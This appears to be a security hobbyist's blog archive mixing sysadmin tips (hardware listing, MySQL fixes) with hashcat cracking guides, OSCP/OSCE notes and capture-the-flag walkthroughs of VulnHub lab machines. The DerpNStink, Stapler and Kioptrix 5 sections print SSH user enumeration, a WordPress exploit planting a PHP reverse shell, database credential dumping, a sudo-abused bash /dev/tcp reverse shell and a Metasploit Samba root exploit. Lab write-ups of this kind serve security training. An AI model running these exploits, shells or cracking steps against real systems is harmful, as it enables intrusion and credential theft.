List hardware components with BASH

January 15, 2021 by admin · Leave a comment

For troubleshooting purposes you might need to list the hardware components via BASH.

This can be achieved via the following executables.

List all components:
lshw -short

Or individually:

List the installed hard drives (Brand, model).
lshw -class disk

View partition info, including RAID:
lsblk

View installed processor:
lscpu

List PCI card and controllers:
lspci

List main board Brand and model:
dmidecode -t 2

List network card:
lshw -short | grep network

List RAM modules and capacity:
dmidecode –type 17- see the “part number” and google the code.
Example:
Part Number: CT102464BA160B.C16 –> Crucible

Power supply:
dmidecode –type 39

Sensors information:
apt-get install lm-sensors
sensors-detect
sensors

Posted in How to. Tagged with .

Analyze wordlists to generate password statistics and hashcat mask files

December 25, 2020 by admin · Leave a comment

If you want to analyze wordlists and generate password occurrence statistics and generate advanced masks for hashcat from a wordlist or a cracked hashes file, you would need to use the Password Analysis and Cracking Kit.

As the author specifies in the manual, the PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password attacks by analyzing common ways that people create passwords.

To install use git or if you have Kali, PACK should already be installed and ready to use.

git clone https://gitlab.com/kalilinux/packages/pack.git

Example usage for a wordlist called hashes2.txt:
sudo python ./pack/statsgen.py hashes2.txt --output=hashes2.masks

Generating the hashcat masks file from the hashes2.masks file generated from above:

sudo python ./pack/maskgen.py ./hashes2.masks -o ./hashes1_generated.hcmask --occurrence --pps=100000000

Output:

The result of the last command should be a hashcat compatible hcmask file, which can be used to crack hashes:

Example of a hcmask file:

?l?l?l?l?l?l?l?l
?l?l?l?l?l?l?l?l?l?l
?l?l?l?l?l?l?l?l?l

The syntax for hashcat mask attack looks like this:

./hashcat.exe -a 3 -m 0 ./hashes1.txt ./masks/hashes2_generated.hcmask -w 3 –status -O

Happy cracking!

Posted in How to.

The skeptic’s OSCP skills requirements guide

July 27, 2019 by admin · Leave a comment

It’s been almost one year since I got my OSCP and I never got the chance to write about it. And since almost everyone does a general review about the Offensive Security Certified Professional certification, I decided to do a short write-up about the actual skill requirements for hacking through the OSCP labs and obtaining the OSCP certification.

So what do you need to know prior to starting the OSCP?

  • general OS internals knowledge (Linux, Windows) – have you ever installed Linux/Win? Know what a partition is? What is a log and where to find it?
  • general networking knowledge (what is a IP subnet, netmask, gateway, how are packets routed)
  • troubleshooting skills
  • using a search engine with advanced parameters (filetype, site, inurl, etc)
  • what is ARP, a firewall, antivirus
  • can you navigate/list/check or change permissions of files with cmd/bash?
  • can you read simple code (BASH, Python, Powershell) scripts?
  • can you write 2 liner scripts in linux?
  • Do you know what this does?

for ip in $(seq 1 254);do ping -c 1 192.168.1.$ip | grep “bytes from”; done

Missing some of the above? You can catch up, it’s not rocket science.

What is not mandatory, but great to have?

  • any kind of programming/scripting experience
  • any kind of experience in the IT Security field
  • experience as a sysadmin, tech support engineer or similar background.

Did OSCP help me with finding a job in IT Security?

  • YES!!

Are you ready for Pain & Sufferance? Brace for impact and register for OSCP. You will bleed, but it will change the way you look at IT Security and Pentesting.

Over and out – OS18010

Posted in How to, OSCP. Tagged with .

Token length exception – no hashes loaded in hashcat

July 27, 2019 by admin · 6 Comments

Trying to crack any kind of hash (SHA1, MD5, etc) and you receive the “Token length exception – no hashes loaded” error in hashcat?

The easiest way to fix this error is to edit the file that contains the hashes, with a text editor like Sublime for Linux or Notepad++ on Windows, use the “Save with encoding” option (Sublime) and specify UTF-8 as the encoding.

This should fix the error and get you underway with your hashcat cracking session, regardless of the hashing algorithm or the attack mode (bruteforce, wordlist, etc).

If this doesn’t work, then you might have blank spaces at the end of each hash line, so delete those spaces.

Happy cracking session!

Posted in cracking, hacking.

My OSCE journey

July 18, 2018 by admin · Leave a comment

Day 1

I started the research process for my Offensive Security OSCE exam and I selected multiple PDF/web pages that might be useful to me in the preparation process for the Cracking the Perimeter course.

My lab time will start in 5 days and I believe that I am lacking multiple skills/knowledge, like everything related to Assembly, egg hunting, advanced exploit development.

I mainly selected resources from Abatchy’s OSCE study plan and converted the web pages to pdf and then joined all the PDFs together using pdfunite.

The result is a 300 page PDF file that will hopefully help me learn and pass the OSCE exam. I couldn’t print the PDF to my Xerox printer, so I had to open the file with Adobe Reader and do a “Save as”, to fix some errors.

No fancy solution here, but it worked…

Day 2

I printed my 300+ pages PDF file and started reading from it. I choose the Assembly part, because I suck at it.

I saw Muts explain how he got a 0day from HP OpenView NNM.


This presentation was actually beautiful and got me thinking that I could actually pull this off (if I sweat enough). If you passed OSCP you will actually understand easier what he is doing and why.

Day 3:

I received my CTP documentation from Offensive Security and I started to the watch the videos.

I am having some issues connecting to the VPN, but I get them sorted out the VPN server had some issues, now it’s working.

The first 2 chapters are easy to follow, most of them are making reference to web exploitation techniques that I have encountered in the OSCP.

In the 3rd chapter, the stuff begins to be interesting: portable executable stuff, code caves, execution hijacking, etc – this will need to be researched because this is where you start to encounter Assembly stuff more.

I am beginning to wonder if my short induction to Assembly was enough for my OSCE journey and if I really need to take the SLAE course from SecurityTube.

I also print my PDF from Offsec, because I find it easier to read/learn from paper-printed materials.

A Kindle friendly format would have done the job too, but that option is not available and the CTP PDF is not optimized for the Kindle, so paper is the solution.

Day 4:

I am not having the free time I would want and I manage to not study at all for 3-4 days.

I finally managed to go through all the video materials from Offensive Security.

The most accessible chapters seem to be the first two (Web Apps and Web foo) and the last one, chapter 9 – Cisco Gre sniffing.

Having more than 8 years of experience in the Networking/Telecom field, it was actually easy to follow the man-in-the-middle stuff from chapter 9. Unfortunately, I can’t say the same for the advanced buffer overflow stuff – the constant bouncing in the shellcode is difficult to follow at this time. However, I did understand the spike fuzzing part.

After watching the videos, I finally have a clear idea of what I need to do, in order to actually move forward with the Cracking the Perimeter course:

To do:

  1. I actually watched this a couple of months ago, but I need a refresh:

Assembly Primer For Hackers (Part 1) System Organization

2. Corelan SEH buffer overflow tutrial

3. Start working on the exercises. Write them very detailed, as if I would send them to Offsec.

Day 5

I am in fuzzer land right now. For my OCE certification and for some bug bounty rlated stuff, I decided to look into the fuzzers that people use these days.

Offensive Security recommends the spike fuzzer, but I find it difficult to use, so I started looking into other fuzzers.

Powerfuzzer seems easy to use, but it unstable. I also used sfuzzer, which seems versatile and easy to use.

I actually tested sfuzzer against my Asus router and I ended up liking it, so I’ll have to decide if I will replace spike with this one, but not sure if it’s the best idea.

</over&out> – for now

Posted in OSCE. Tagged with , , .

Fix Mysql “128 rollback segment(s) are active” and “Waiting for purge to start”

May 14, 2018 by admin · 4 Comments

The main problem is not the fact that you are receiving the error when issuing service mysql status, but the fact that the database is stuck and responding very slowly.

You can get the specified error after updating Mysql server to 10.0.x and this happens due to innodb storage formats. Probably the previous Mysql server version used Barracuda file format and after the update you use the Antelope storage format.

What you want to do is change the format to Barracuda and make this setting global.

The first thing to do is to backup all your databases !!

Edit your Mysql configuration file (/etc/mysql/my.cnf or other- depending on distro) and add:

innodb-rollback-segments=256
innodb_file_format=Barracuda

Save and restart mysql process.

The login to the Mysql server and issue :

mysql -u admin -p`cat /etc/psa/.psa.shadow`         //for Plesk

mysql -u admin -p         // without Plesk

show variables like “%innodb_file%”;

If you see Antelope, then do this:

SET GLOBAL innodb_file_per_table=1;

SET GLOBAL innodb_file_format=Barracuda;

GRANT ALL PRIVILEGES ON yourdb.* TO ‘youruser’@’localhost’;

FLUSH PRIVILEGES;

Restart mysql (and do a reboot?).

In the end you should have something like this:

If this doesn’t work, you might want to try THIS first and restart the process described above.

Posted in linux, mysql, Plesk. Tagged with , , , .

Compress all Mysql tables from a database

May 14, 2018 by admin · 1 Comment

db-table-list.txt contains the list of tables from a specific db, exported with:

use somedb;

SELECT * FROM somedb;

And filtered with:

cut -d’|’ -f 2 ./db-table-list.txt

Here’s the script:

#!/bin/bash

for tbl in $(cat ./db-table-list.txt); do
mysql –user=root \
–password=”suchsecure” \
–execute=”use somedb;” \
–execute=”ALTER TABLE $tbl ROW_FORMAT=Compressed;”
done <<< “$tbl”

Posted in mysql, Plesk. Tagged with , , .

DerpNStink: 1 walkthrough

March 8, 2018 by admin · Leave a comment

Walkthrough of DerpNstink: 1

Enumeration:

root@kali:~# nmap -sT -A -sV –version-intensity 6 -p- 192.168.31.149

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap –script=*ftp* –script-args=unsafe=1 -p 20,21 192.168.31.149

Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-06 06:35 EST
Nmap scan report for 192.168.31.149
Host is up (0.00031s latency).

PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using metasploit we search for SSH users:

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

Using searchsplotit we find an OpenSSH vulnerability that might help identify SSH users:

python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e –trials 5 –bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari

[*] Testing SSHD at: 192.168.31.149:22, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host 192.168.31.149 is 0.0631635 seconds.
[*] Baseline variation for host 192.168.31.149 is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

dirb finds us some interesting results:

—- Entering directory: http://192.168.31.149/php/ —-
==> DIRECTORY: http://192.168.31.149/php/phpmyadmin/
—- Entering directory: http://192.168.31.149/temporary/ —-
—- Entering directory: http://192.168.31.149/weblog/ —-
==> DIRECTORY: http://192.168.31.149/weblog/wp-admin/

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find http://192.168.31.149/webnotes, which offers some clues:

We try to login via SSH, but we get trolled:

Aanother dirb result catches our attention.

http://192.168.31.149/weblog/

This redirects to http://derpnstink.local/weblog/ which we cannot view, because of DNS resolution fail. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff
192.168.31.149 derpnstink.local
192.168.31.149 www.derpnstink.local
root@kali:~/Desktop/AUTOMATED_actions#

Now we can access the page and it’s an obvious WordPress, so we fire wpscan to bruteforce some users:

wpscan –url http://derpnstink.local/weblog/ –wordlist /usr/share/wordlists/dirb/big.txt –threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
+—-+————-+———————————+———-+
| Id | Login | Name | Password |
+—-+————-+———————————+———-+
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |
+—-+————-+———————————+———-+

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run https://www.exploit-db.com/exploits/34681/

I copy a PHP reverse shell and run a netcat listener

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the 34681.py exploit.

python ./34681.py -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

1 echo $SHELL
2 export TERM=xterm-256color
3 export SHELL=BASH
4 stty rows 55 columns 205
5 reset

We find some users in /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the SQL user and pass:

** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘root’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘mysql’);

Login to Mysql server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
2 rows in set (0.00 sec)

mysql>

Using hashcat I recover the following passwords for wordpress:

9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57

 

We found the 1st flag by logging in wordpress with unclestinky

http://derpnstink.local/weblog/?p=8&preview=true

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
cat troubleshooting.txt
*******************************************************************
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?

********************************************************************

********************************************************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.

Thank you for using our product.

********************************************************************

The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to privesc to user mrderp to execute commands as sudo.

We go to /home

www-data@DeRPnStiNK:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 12 12:54 .
drwxr-xr-x 23 root root 4.0K Nov 12 13:39 ..
drwx—— 10 mrderp mrderp 4.0K Jan 9 12:15 mrderp
drwx—— 12 stinky stinky 4.0K Jan 9 12:14 stinky

Password reuse ?

su stinky
Password: wedgie57

Works!!

We cannot seem to sudo with stinky

stinky@DeRPnStiNK:/home$ sudo su -l
sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.
stinky@DeRPnStiNK:/home$

Found several ssh private keys, none helped.

 

Hint:

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd
pwd
/home/stinky/ftp/files/network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$

Can’t use that because of permissions for tcpump, but we do find a pcap file in /home/stinky/Documents

We read it and search for papss in the txt file:

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
<ts$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$

 

Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

 

mrderp@DeRPnStiNK:~/Downloads$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$

We create derpy.sh and add an nc reverse shell command, start the listener on localmachine:

mrderp@DeRPnStiNK:~/binaries$ echo ‘#!/bin/bash’ >> derpy.sh
echo ‘#!/bin/bash’ >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo ‘bash -i >& /dev/tcp/192.168.31.139/888 0>&1′ >> derpy.sh
>> derpy.shi >& /dev/tcp/192.168.31.139/888 0>&1’
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
cat derpy.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.31.139/888 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
sudo ./derpy.sh
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root ?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#

Posted in hacking, vulnhub. Tagged with , , , .

Stapler 1 walkthrough.

February 27, 2018 by admin · Leave a comment

Stapler 1 vulnerable machine walkthrough.

Firing the recon script returns:

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-27 07:35 EST
Nmap scan report for 192.168.31.147
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can’t get directory listing: Can’t parse PASV response: “Permission denied.”
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| “DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01.”{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

enum4linux also finds:

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))

[+] Attempting to map shares on 192.168.31.147
//192.168.31.147/print$ Mapping: DENIED, Listing: N/A
//192.168.31.147/kathy Mapping: OK, Listing: OK
//192.168.31.147/tmp Mapping: OK, Listing: OK

I try the low hanging fruit from my Github page  and it’s a win.

msf > use exploit/linux/samba/is_known_pipename

msf exploit(linux/samba/is_known_pipename) > setg RHOST 192.168.31.147
RHOST => 192.168.31.147
msf exploit(linux/samba/is_known_pipename) > options

—- ————— ——– ———–
RHOST 192.168.31.147 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory

Exploit target:

Id Name
— —-
0 Automatic (Interact)

msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
SMB_SHARE_NAME => /tmp
msf exploit(linux/samba/is_known_pipename) > run

[*] 192.168.31.147:139 – Using location \\192.168.31.147\tmp\ for the path
[*] 192.168.31.147:139 – Retrieving the remote path of the share ‘tmp’
[*] 192.168.31.147:139 – Share ‘tmp’ has server-side path ‘/var/tmp
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IQqlqbox.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using \\PIPE\/var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using /var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IxhxfTZL.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using \\PIPE\/var/tmp/IxhxfTZL.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using /var/tmp/IxhxfTZL.so…
[+] 192.168.31.147:139 – Probe response indicates the interactive payload was loaded…
[*] Found shell.
[*] Command shell session 1 opened (192.168.31.139:40411 -> 192.168.31.147:139) at 2018-02-27 08:32:10 -0500

id
uid=0(root) gid=0(root) groups=0(root)

That was fast, but no pain means no gain.

I upgrade and beautify  the shell and print the flag:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

 

 

 

 

Posted in vulnhub.

Kioptrix 5 walkthrough

February 26, 2018 by admin · Leave a comment

root@kali:~# netdiscover -r 192.168.31.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.31.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.31.2 00:50:56:e1:a9:71 1 60 VMware, Inc.
192.168.31.146 00:50:56:20:56:e2 1 60 VMware, Inc.
192.168.31.254 00:50:56:f8:bd:9c 1 60 VMware, Inc.

Scanning:

nmap -sT -sV -A -p- 192.168.31.146 -n –open

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-26 09:05 EST
Nmap scan report for 192.168.31.146
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

